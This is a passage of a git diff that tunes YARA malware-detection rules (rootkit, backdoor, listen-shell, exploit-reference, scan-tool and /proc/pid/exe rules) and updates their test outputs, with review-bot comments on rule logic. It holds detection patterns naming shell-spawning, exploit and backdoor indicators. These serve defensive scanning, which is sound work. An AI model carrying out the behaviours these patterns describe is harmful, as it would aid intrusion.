$http_443 and none of ($not*) } diff --git a/rules/evasion/rootkit/linux_kernel.yara b/rules/evasion/rootkit/linux_kernel.yara index 5714bba81..d870340b9 100644 --- a/rules/evasion/rootkit/linux_kernel.yara +++ b/rules/evasion/rootkit/linux_kernel.yara @@ -41,7 +41,7 @@ rule lkm_dirent: high { $linux = "Linux" $not_syscalls = "#define _LINUX_SYSCALLS_H" $not_itimer = "__kernel_old_itimerval" - + $not_internal = "internal_getdents" condition: filesize < 2MB and all of ($l*) and none of ($not*) } diff --git a/rules/exec/shell/nohup.yara b/rules/exec/shell/nohup.yara index b42dc1a00..a11f35f9c 100644 --- a/rules/exec/shell/nohup.yara +++ b/rules/exec/shell/nohup.yara 
@@ -36,21 +36,6 @@ rule elf_nohup: high { uint32(0) == 1179403647 and filesize < 1MB and any of ($nohup*) and none of ($not*) } -rule trap_1: high { - meta: - description = "Protects itself from early termination via SIGHUP" - hash_2023_Linux_Malware_Samples_3059 = "305901aa920493695729132cfd20cbddc9db2cf861071450a646c6a07b4a50f3" - hash_2023_Linux_Malware_Samples_553a = "553ac527d6a02a84c787fd529ea59ce1eb301ddfb180d89b9e62108d92894185" - hash_2023_Linux_Malware_Samples_7a60 = "7a60c84fb34b2b3cd7eed3ecd6e4a0414f92136af656ed7d4460b8694f2357a7" - - strings: - $ref = "trap '' 1" - $ref2 = "trap \"\" 1" - - condition: - any of them -} - rule nohup_bash: high { meta: description = "Calls bash with nohup" diff --git a/rules/exec/shell/sighup_trap.yara b/rules/exec/shell/sighup_trap.yara new file mode 100644 index 000000000..c2cc81895 --- /dev/null +++ b/rules/exec/shell/sighup_trap.yara @@ -0,0 +1,14 @@ +rule trap_1: high { + meta: + description = "Protects itself from early termination via SIGHUP" + hash_2023_Linux_Malware_Samples_3059 = "305901aa920493695729132cfd20cbddc9db2cf861071450a646c6a07b4a50f3" + hash_2023_Linux_Malware_Samples_553a = "553ac527d6a02a84c787fd529ea59ce1eb301ddfb180d89b9e62108d92894185" + hash_2023_Linux_Malware_Samples_7a60 = "7a60c84fb34b2b3cd7eed3ecd6e4a0414f92136af656ed7d4460b8694f2357a7" + + strings: + $ref = "trap '' 1" + $ref2 = "trap \"\" 1" + $not_netcat_example = "ignore most signals; the parent will nuke the kid" + condition: + any of ($ref*) and none of ($not*) +} \ No newline at end of file diff --git a/rules/false_positives/libdw.yara b/rules/false_positives/libdw.yara new file mode 100644 index 000000000..36b0ac115 --- /dev/null +++ b/rules/false_positives/libdw.yara @@ -0,0 +1,10 @@ +rule libdw_override: override { + meta: + description = "libdw.so" + ptrace_injector = "medium" + strings: + $dward = "invalid DWARF" + + condition: + filesize < 2MB and any of them +} 
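Review bot: `libdw_override` downgrades `ptrace_injector` to medium for any file under 2MB that contains the string `invalid DWARF`, which is a generic DWARF-parser message rather than a libdw fingerprint, so a tracer or injector that bundles its own DWARF reader would receive the same downgrade. I would pair the string with something specific to the library, e.g. a second string for its soname (`$soname = "<libdw soname placeholder>"`) and `all of them`, or at least document in meta which sample motivated the override so the breadth can be revisited.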
diff --git a/rules/false_positives/linux_src.yara b/rules/false_positives/linux_src.yara index 6bc14ce4c..e922ad6da 100644 --- a/rules/false_positives/linux_src.yara +++ b/rules/false_positives/linux_src.yara @@ -7,6 +7,7 @@ rule linux_test_script: override linux { hidden_short_path = "medium" kernel_module_loader = "medium" cd_root = "medium" + server_address = "medium" description = "Linux test script" strings: diff --git a/rules/false_positives/sudo.yara b/rules/false_positives/sudo.yara index bd3f714f8..f82b437a8 100644 --- a/rules/false_positives/sudo.yara +++ b/rules/false_positives/sudo.yara @@ -1,7 +1,7 @@ rule sudo: override linux { meta: description = "sudo" - proc_exe = "medium" + proc_c_exe = "medium" strings: $ref = "SUDO_INTERCEPT_FD" diff --git a/rules/false_positives/vmtools.yara b/rules/false_positives/vmtools.yara index bec7a593e..d9525168e 100644 --- a/rules/false_positives/vmtools.yara +++ b/rules/false_positives/vmtools.yara @@ -3,9 +3,11 @@ rule vmtools: override { description = "vmtools" backdoor = "medium" linux_critical_system_paths_high = "medium" - + proc_net_route_high = "medium" + proc_s_exe = "medium" + sys_net_recon_exfil = "medium" strings: - $vmtools = "VMTools_LoadConfig" fullword + $vmtools = "VMTools" fullword $vmsupport = "VMSUPPORT" fullword condition: diff --git a/rules/fs/permission/permission-modify-dangerous.yara b/rules/fs/permission/permission-modify-dangerous.yara index 8af721630..e13faf533 100644 --- a/rules/fs/permission/permission-modify-dangerous.yara +++ b/rules/fs/permission/permission-modify-dangerous.yara @@ -22,7 +22,7 @@ rule chmod_dangerous_exec: high exfil { $not_chmod_01777 = "chmod 01777" $not_chromium = "CHROMIUM_TIMESTAMP" $not_var_tmp = "chmod 0777 /var/tmp" fullword - + $not_extutils = "chmod 0777, [.foo.bar] doesn't work on VMS" condition: filesize < 50MB and $ref and none of ($not*) } diff --git a/rules/fs/proc/pid-exe.yara b/rules/fs/proc/pid-exe.yara index 44496b6ce..6403f307e 100644 
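Review bot: The override in `sudo.yara` now names `proc_c_exe`, but the rules the split in `pid-exe.yara` introduces are `proc_s_exe`, `proc_d_exe` and `proc_py_exe` (and `vmtools.yara` in this same change uses `proc_s_exe`), so unless a `proc_c_exe` rule exists below the visible part of `pid-exe.yara` this override refers to nothing and sudo keeps its high rating. Given the string forms involved, the intended key is presumably `proc_s_exe = "medium"` or `proc_d_exe = "medium"`, whichever form sudo actually contains. A fixture under `tests/` for the sudo binary would have caught the mismatch.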
--- a/rules/fs/proc/pid-exe.yara
+++ b/rules/fs/proc/pid-exe.yara
@@ -1,13 +1,31 @@
-rule proc_exe: high {
+rule proc_s_exe: high {
 meta:
- description = "accesses underlying executable of other processes"
- hash_2023_OK_4f5c = "4f5cfb805feb7576e594f1bb3b773ba0ca80e09e49bfb7e3507f815f774ac62d"
- hash_2023_Pupy_2ab5 = "2ab59fa690e502a733aa1500a96d8e94ecb892ed9d59736cca16a09538ce7d77"
- hash_2023_Unix_Dropper_Mirai_58c5 = "58c54ded0af2fffb8cea743d8ec3538cecfe1afe88d5f7818591fb5d4d2bd4e1"
+ description = "accesses underlying executable of other processes"
 strings:
 $string = "/proc/%s/exe" fullword
- $digit = "/proc/%d/exe" fullword
+ $not_tool = /[Uu]sage:/ fullword
+ condition:
+ $string and none of ($not*)
+}
+
+rule proc_d_exe: medium {
+ meta:
+ description = "accesses underlying executable of other processes"
+
+ strings:
+ $digit = "/proc/%d/exe" fullword
+ $not_cgroup = "cgroup" fullword
+ $not_tool = /[Uu]sage:/ fullword
+ condition:
+ $digit and none of ($not*)
+}
+
+rule proc_py_exe: high {
+ meta:
+ description = "accesses underlying executable of other processes"
+
+ strings:
 $python = "/proc/{}/exe" fullword
 condition:
diff --git a/rules/hw/dev/sd_mmc.yara b/rules/hw/dev/sd_mmc.yara
index 7ae5710b3..16e8e5017 100644
--- a/rules/hw/dev/sd_mmc.yara
+++ b/rules/hw/dev/sd_mmc.yara
@@ -4,9 +4,21 @@ rule dev_mmc: high {
 description = "access raw SD/MMC devices"
 strings:
- $val = /\/dev\/mmcblk[\$%\w\{\}]{0,16}/
- $block_val = /\/dev\/block\/mmcblk[\$%\w\{\}]{0,16}/
+ $dev_mmc = /\/dev\/mmcblk[\$%\w\{\}]{0,16}/
+ $dev_block = /\/dev\/block\/mmcblk[\$%\w\{\}]{0,16}/
 condition:
- filesize < 10MB and any of them
+ filesize < 10MB and any of ($dev*)
+}
+
+rule dev_mmc_ok: override {
+ meta:
+ dev_mmc = "medium"
+
+ strings:
+ $not_fwupd = "fu_firmware_set_id"
+ $not_ipmi = "/dev/ipmi"
+ $not_grub = "GRUB" fullword
+ condition:
+ dev_mmc and any of them
 }
diff --git a/rules/hw/dev/ubi.yara b/rules/hw/dev/ubi.yara
index 5ee50137e..bf858ad27 100644
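Review bot: All three rules that replace `proc_exe` carry the identical description `accesses underlying executable of other processes`, so a report line no longer tells the reader whether the `%s`, `%d` or `{}` form fired, and the three sample hashes that documented the original rule were dropped rather than moved to whichever new rule still matches those samples. I would give each rule a distinguishing description, e.g. `description = "accesses underlying executable of other processes (/proc/%d/exe)"` for `proc_d_exe`, and re-attach the hashes after checking the samples against the split rules. `$not_tool = /[Uu]sage:/ fullword` excludes anything that prints a usage banner and is duplicated in two rules; a one-line comment stating the intent would help the next person tuning it. `proc_py_exe`'s condition continues below the hunk.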
--- a/rules/hw/dev/ubi.yara +++ b/rules/hw/dev/ubi.yara @@ -9,3 +9,14 @@ rule ubi: high linux { condition: any of them } + +rule expected_ubi_users : override { + meta: + ubi = "medium" + strings: + $libuboot = "libuboot" + $usage = "Usage:" + $ubi = "ubifs" fullword + condition: + filesize < 120KB and any of them +} \ No newline at end of file diff --git a/rules/impact/degrade/firewall.yara b/rules/impact/degrade/firewall.yara index ed967cae9..929e2f263 100644 --- a/rules/impact/degrade/firewall.yara +++ b/rules/impact/degrade/firewall.yara @@ -18,7 +18,7 @@ rule selinux_firewall: high linux { $not_selinux_init = "SELINUX_INIT" $not_define = "#define" fullword $not_netlink = "NETLINK" fullword - + $not_containerd = "containerd" fullword condition: filesize < 1MB and $selinux and any of ($f*) and none of ($not*) } diff --git a/rules/impact/exploit/exploit.yara b/rules/impact/exploit/exploit.yara index fb1e92b08..593214103 100644 --- a/rules/impact/exploit/exploit.yara +++ b/rules/impact/exploit/exploit.yara @@ -24,6 +24,18 @@ rule exploitation: medium { any of ($ref*) and none of ($not*) and not legal_license } +rule Exploit: medium { + meta: + description = "References an exploit" + + strings: + $ref6 = "Exploit" fullword + $not_reduction = "Exploit reduction" + + condition: + any of ($ref*) and none of ($not*) and not legal_license +} + rule exploiter: high { meta: description = "References an exploit" @@ -36,7 +48,6 @@ rule exploiter: high { $ref3 = "sploit" fullword $ref4 = "spl0it" fullword $ref5 = "pop a shell" fullword - $ref6 = "Exploit" fullword $not_ms_example = "Drive-by Compromise" condition: diff --git a/rules/impact/remote_access/backdoor.yara b/rules/impact/remote_access/backdoor.yara index 35203ede1..04a8ea70d 100644 --- a/rules/impact/remote_access/backdoor.yara +++ b/rules/impact/remote_access/backdoor.yara 
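Review bot: The new `Exploit` rule in `exploit.yara` keeps the `$ref6` identifier from the rule it was split out of and wraps a single string in `any of ($ref*)`, and its capitalised name breaks with the lowercase rule names used everywhere else in this change; `$ref = "Exploit" fullword` with `$ref and none of ($not*) and not legal_license` says the same thing more plainly. The `$not_reduction = "Exploit reduction"` exclusion covers only that exact phrase, so similar product wording such as "Exploit protection" may still fire the rule; that is a tuning question rather than a defect, but worth a note in meta. `legal_license` is defined outside the hunk, so its ordering relative to the new rule cannot be checked here.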
@@ -20,8 +20,10 @@ rule backdoor: high { strings: $ref = /[a-zA-Z\-_ \']{0,16}[bB]ackdoor[a-zA-Z\-_ ]{0,16}/ fullword + $not_vcpu = "VCPUInfoBackdoor" + $not_vmware = "gGuestBackdoorOps" condition: - filesize < 40MB and any of them and not wordlist + filesize < 40MB and any of them and not wordlist and none of ($not*) } rule backdoor_caps: high { diff --git a/rules/impact/remote_access/listen_shell.yara b/rules/impact/remote_access/listen_shell.yara index 3c5c11ec9..33d14bb3b 100644 --- a/rules/impact/remote_access/listen_shell.yara +++ b/rules/impact/remote_access/listen_shell.yara @@ -1,4 +1,4 @@ -rule listens_and_executes_shell: high { +rule listens_and_executes_shell: medium { meta: description = "Listens at a port and executes shells" hash_2024_Downloads_8cad = "8cad755bcf420135c0f406fb92138dcb0c1602bf72c15ed725bd3b76062dafe5" @@ -22,9 +22,12 @@ rule listens_and_executes_shell: high { $sh_cmd = "cmd.exe" $not_setlocale = "setlocale" fullword $not_ptrace = "ptrace" fullword + $not_image_jpeg = "image/jpeg" + $not_openpgp = "openpgp" + $not_dbus = "dbus" fullword condition: - filesize < 10MB and any of ($f_sock*) and any of ($f_exec*) and any of ($f_inet*) and any of ($f_listen*) and any of ($sh*) and none of ($not*) + filesize < 3MB and any of ($f_sock*) and any of ($f_exec*) and any of ($f_inet*) and any of ($f_listen*) and any of ($sh*) and none of ($not*) } rule go_tcp_listen_and_exec_shell: high { diff --git a/rules/impact/remote_access/net_term.yara b/rules/impact/remote_access/net_term.yara index 46253ad95..53b6119d2 100644 --- a/rules/impact/remote_access/net_term.yara +++ b/rules/impact/remote_access/net_term.yara 
@@ -84,16 +84,17 @@ rule miner_kvryr_stak_alike: high { hash_2023_Linux_Malware_Samples_39c3 = "39c33c261899f2cb91f686aa6da234175237cd72cfcd9291a6e51cbdc86d4def" strings: - $upload = "upload" - $shell = "shell" fullword - $bin_sh = "/bin/" - $tcsetattr = "tcsetattr" - $termios = "termios" fullword - $execve = "execve" - $numa = "NUMA" - + $f_upload = "upload" + $f_shell = "shell" fullword + $f_bin_sh = "/bin/" + $f_tcsetattr = "tcsetattr" + $f_termios = "termios" fullword + $f_execve = "execve" + $f_numa = "NUMA" + + $not_perf = "PERF_RECORD" condition: - filesize < 12MB and all of them + filesize < 12MB and all of ($f*) and none of ($not*) } rule proxy_http_aes_terminal_combo: medium { diff --git a/rules/lateral/scan/scan_tool.yara b/rules/lateral/scan/scan_tool.yara index 71e3b684a..2a62612a9 100644 --- a/rules/lateral/scan/scan_tool.yara +++ b/rules/lateral/scan/scan_tool.yara @@ -6,22 +6,24 @@ rule generic_scan_tool: medium { hash_2023_Linux_Malware_Samples_00ae = "00ae07c9fe63b080181b8a6d59c6b3b6f9913938858829e5a42ab90fb72edf7a" strings: - // $f_gethostbyname = "gethostbyname" - $f_socket = "socket" - $f_connect = "connect" + $f_gethostbyname = "gethostbyname" + $f_ip = "%d.%d.%d.%d" fullword + $f_socket = "socket" fullword + $f_connect = "connect" fullword $o_banner = "banner" $o_Probe = "Probe" $o_probe = "probe" $o_scan = "scan" $o_port = "port" $o_target = "target" - $o_ip = "%d.%d.%d.%d" + $o_Port = "Port" + $o_Target = "Target" $not_nss = "NSS_USE_SHEXP_IN_CERT_NAME" $not_microsoft = "Microsoft Corporation" $not_php_reference = "ftp_nb_put" condition: - all of ($f*) and 2 of ($o*) and none of ($not*) + 3 of ($f*) and 2 of ($o*) and none of ($not*) } rule root_scan_tool: high { diff --git a/rules/net/download/fetch.yara b/rules/net/download/fetch.yara index 9850a4323..fe132d1d4 100644 --- a/rules/net/download/fetch.yara +++ b/rules/net/download/fetch.yara 
@@ -138,6 +138,7 @@ rule high_fetch_command_val: high { $not_s_key = "curl -s --key" $not_local = "curl -ks https://localhost" $not_continue = "--continue-at" + $not_pciid = "https://pci-ids.ucw.cz" $x_chmod = "chmod" fullword $x_Chmod = "Chmod" fullword diff --git a/rules/persist/kernel_module/symbol-lookup.yara b/rules/persist/kernel_module/symbol-lookup.yara index bfdbd8034..c5e81ba18 100644 --- a/rules/persist/kernel_module/symbol-lookup.yara +++ b/rules/persist/kernel_module/symbol-lookup.yara @@ -40,3 +40,17 @@ rule bpftrace: override linux { condition: filesize < 2MB and any of them } + +rule bpf: override linux { + meta: + description = "libbpf" + filetypes = "so,elf" + kallsyms_lookup = "medium" + + strings: + $ref = "BPF" fullword + $ref2 = "LIBBPF" fullword + + condition: + filesize < 2MB and any of them +} diff --git a/rules/process/thread_local_storage.yara b/rules/process/thread_local_storage.yara deleted file mode 100644 index 68f190e9e..000000000 --- a/rules/process/thread_local_storage.yara +++ /dev/null @@ -1,11 +0,0 @@ -rule tls_get_addr: medium { - meta: - description = "looks up memory addresses for thread local storage or linked libraries" - ref = "https://chao-tic.github.io/blog/2018/12/25/tls" - - strings: - $val = "__tls_get_addr" fullword - - condition: - any of them -} diff --git a/tests/does-nothing/does-nothing.simple b/tests/does-nothing/does-nothing.simple index 37c6379a5..af4355d54 100644 --- a/tests/does-nothing/does-nothing.simple +++ b/tests/does-nothing/does-nothing.simple @@ -13,7 +13,6 @@ fs/path/etc: low fs/path/home: medium fs/permission/chown: medium fs/permission/modify: medium -lateral/scan/tool: medium net/socket/receive: low net/socket/send: low persist/daemon: medium diff --git a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff index 35179e6ff..50a5439c3 100644 --- a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff 
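Review bot: The `bpf` override lowers `kallsyms_lookup` to medium for any ELF or shared object under 2MB containing `BPF` as a word, which is far broader than the `libbpf` its description names; anything that resolves kernel symbols and also mentions BPF in a string would be downgraded alongside libbpf itself. Restricting it to the library-specific token, `filesize < 2MB and $ref2` with `$ref2 = "LIBBPF" fullword`, or requiring both strings, keeps the override aimed at what the description claims. Whether kernel modules fall under the `filetypes = "so,elf"` selector cannot be confirmed from the hunk; if they do, the broad form matters more.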
+++ b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff 
@@ -1,6 +1,6 @@ ## Changed: javascript/2024.lottie-player/lottie-player.min.js [🟡 MEDIUM → 😈 CRITICAL] -### 40 new behaviors +### 39 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | |-----------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| @@ -21,7 +21,6 @@ | +MEDIUM | **[impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent)** | references an 'agent' | [useragent](https://github.com/search?q=useragent&type=code) | | +MEDIUM | **[impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat)** | references a 'heartbeat' | [heartBeatTimeout](https://github.com/search?q=heartBeatTimeout&type=code)
[heartbeat_pulse](https://github.com/search?q=heartbeat_pulse&type=code)
[lastHeartbeatResponse](https://github.com/search?q=lastHeartbeatResponse&type=code)
[updateLastHeartbeat](https://github.com/search?q=updateLastHeartbeat&type=code) | | +MEDIUM | **[impact/resource/bank_xfer](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/resource/bank_xfer.yara#bank_xfer)** | references 'bank transfer' | [bank transfer](https://github.com/search?q=bank+transfer&type=code) | -| +MEDIUM | **[lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool)** | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | +MEDIUM | **[net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload)** | upload content via HTTP form | [POST](https://github.com/search?q=POST&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code) | | +MEDIUM | **[net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post)** | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | +MEDIUM | **[net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket)** | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [WalletLinkWebSocket](https://github.com/search?q=WalletLinkWebSocket&type=code)
[WebSocket:gV](https://github.com/search?q=WebSocket%3AgV&type=code)
[WebSocket:typeof](https://github.com/search?q=WebSocket%3Atypeof&type=code)
[WebSocketClass:h](https://github.com/search?q=WebSocketClass%3Ah&type=code)
[WebSocketClass:l](https://github.com/search?q=WebSocketClass%3Al&type=code)
[clearWebSocket](https://github.com/search?q=clearWebSocket&type=code)
[webSocket:e](https://github.com/search?q=webSocket%3Ae&type=code)
[webSocket:r](https://github.com/search?q=webSocket%3Ar&type=code)
[webSocket:t](https://github.com/search?q=webSocket%3At&type=code) | diff --git a/tests/javascript/clean/203.b7219352.chunk.js.simple b/tests/javascript/clean/203.b7219352.chunk.js.simple index a306dedb0..0e5568b9b 100644 --- a/tests/javascript/clean/203.b7219352.chunk.js.simple +++ b/tests/javascript/clean/203.b7219352.chunk.js.simple @@ -36,7 +36,6 @@ hw/wireless: low impact/degrade/infection: medium impact/remote_access/agent: medium impact/remote_access/heartbeat: medium -lateral/scan/tool: medium net/dns/txt: low net/download: medium net/http/cookies: medium diff --git a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple index f68825144..d973aaddd 100644 --- a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple +++ b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple @@ -21,6 +21,8 @@ data/encoding/json_encode: low data/encoding/reverse: low data/random/insecure: low discover/group/lookup: medium +discover/process/effective_groupid_get: medium +discover/process/parent_pid_get: low discover/processes/list: medium discover/system/hostname_get: low discover/system/platform: low @@ -91,9 +93,7 @@ persist/daemon: medium process/chdir: low process/chroot: low process/create: low -process/effective_groupid_get: medium process/groupid_set: low -process/parent_pid_get: low process/userid_set: low sus/exclamation: medium sus/intercept: medium diff --git a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple index 842e48d3e..fd567afc4 100644 --- a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple +++ b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple 
@@ -22,6 +22,8 @@ data/encoding/reverse: low
 data/hash/md5: low
 data/random/insecure: low
 discover/group/lookup: medium
+discover/process/effective_groupid_get: medium
+discover/process/parent_pid_get: low
 discover/processes/list: medium
 discover/system/hostname_get: low
 discover/system/platform: low
@@ -91,9 +93,7 @@ persist/daemon: medium
 process/chdir: low
 process/chroot: low
 process/create: low
-process/effective_groupid_get: medium
 process/groupid_set: low
-process/parent_pid_get: low
 process/userid_set: low
 sus/exclamation: medium
 sus/intercept: medium
diff --git a/tests/javascript/clean/connection.js.simple b/tests/javascript/clean/connection.js.simple
index 76dcc4f27..04a5d5256 100644
--- a/tests/javascript/clean/connection.js.simple
+++ b/tests/javascript/clean/connection.js.simple
@@ -6,7 +6,6 @@ credential/password: low
 data/embedded/base64_terms: medium
 data/embedded/base64_url: medium
 data/encoding/base64: low
-lateral/scan/tool: medium
 net/dns: low
 net/socket/send: low
 net/url/embedded: medium
diff --git a/tests/javascript/clean/faker.js.simple b/tests/javascript/clean/faker.js.simple
index a5474ab76..8bd713980 100644
--- a/tests/javascript/clean/faker.js.simple
+++ b/tests/javascript/clean/faker.js.simple
@@ -14,7 +14,6 @@ data/embedded/base64_url: medium
 data/encoding/base64: low
 data/encoding/json_decode: low
 data/encoding/json_encode: low
-evasion/file/location/tmp_x11_unix: low
 exec/plugin: low
 exfil/office_file_ext: medium
 exfil/stealer/credit_card: medium
@@ -26,7 +25,6 @@ fs/path/usr_local: medium
 fs/path/var: low
 impact/infection/worm: medium
 impact/remote_access/trojan: medium
-lateral/scan/tool: medium
 net/download: medium
 net/http/fake_user_agent: high
 net/http/form_upload: medium
diff --git a/tests/javascript/clean/faker.min.js.simple b/tests/javascript/clean/faker.min.js.simple
index d16220b08..5baafcaa1 100644
--- a/tests/javascript/clean/faker.min.js.simple
+++ b/tests/javascript/clean/faker.min.js.simple
@@ -9,7 +9,6 @@ data/compression/bzip2: low
 data/compression/gzip: low
 data/encoding/json_decode: low
 data/encoding/json_encode: low
-evasion/file/location/tmp_x11_unix: low
 exec/plugin: low
 exfil/office_file_ext: medium
 exfil/stealer/credit_card: medium
@@ -21,7 +20,6 @@ fs/path/usr_local: medium
 fs/path/var: low
 impact/infection/worm: medium
 impact/remote_access/trojan: medium
-lateral/scan/tool: medium
 net/download: medium
 net/http/fake_user_agent: high
 net/http/form_upload: medium
diff --git a/tests/javascript/clean/frequency_lists.js.simple b/tests/javascript/clean/frequency_lists.js.simple
index 6f90669ac..c3fd38930 100644
--- a/tests/javascript/clean/frequency_lists.js.simple
+++ b/tests/javascript/clean/frequency_lists.js.simple
@@ -17,7 +17,6 @@ impact/remote_access/agent: medium
 impact/remote_access/heartbeat: medium
 impact/remote_access/implant: medium
 impact/remote_access/trojan: medium
-lateral/scan/tool: medium
 net/download: medium
 net/ip/multicast_send: low
 net/ip/spoof: medium
diff --git a/tests/javascript/clean/mode-php.js.simple b/tests/javascript/clean/mode-php.js.simple
index 0d3f79a79..a6b8442a6 100644
--- a/tests/javascript/clean/mode-php.js.simple
+++ b/tests/javascript/clean/mode-php.js.simple
@@ -11,6 +11,8 @@ data/encoding/base64: low
 data/encoding/reverse: low
 data/hash/md5: low
 data/random/insecure: low
+discover/process/effective_groupid_get: medium
+discover/process/parent_pid_get: low
 discover/system/hostname_get: low
 discover/system/platform: low
 discover/user/USER: low
@@ -57,7 +59,5 @@ net/url/embedded: low
 net/url/encode: medium
 persist/daemon: medium
 process/chroot: low
-process/effective_groupid_get: medium
 process/groupid_set: low
-process/parent_pid_get: low
 process/userid_set: low
diff --git a/tests/javascript/clean/mode-php_laravel_blade.js.simple b/tests/javascript/clean/mode-php_laravel_blade.js.simple
index e929ec3b9..5bb3f1e5c 100644
--- a/tests/javascript/clean/mode-php_laravel_blade.js.simple
+++ b/tests/javascript/clean/mode-php_laravel_blade.js.simple
@@ -11,6 +11,8 @@ data/encoding/base64: low
 data/encoding/reverse: low
 data/hash/md5: low
 data/random/insecure: low
+discover/process/effective_groupid_get: medium
+discover/process/parent_pid_get: low
 discover/system/hostname_get: low
 discover/system/platform: low
 discover/user/USER: low
@@ -57,7 +59,5 @@ net/url/embedded: low
 net/url/encode: medium
 persist/daemon: medium
 process/chroot: low
-process/effective_groupid_get: medium
 process/groupid_set: low
-process/parent_pid_get: low
 process/userid_set: low
diff --git a/tests/javascript/clean/php.js.simple b/tests/javascript/clean/php.js.simple
index 18a7d482d..a4cf97734 100644
--- a/tests/javascript/clean/php.js.simple
+++ b/tests/javascript/clean/php.js.simple
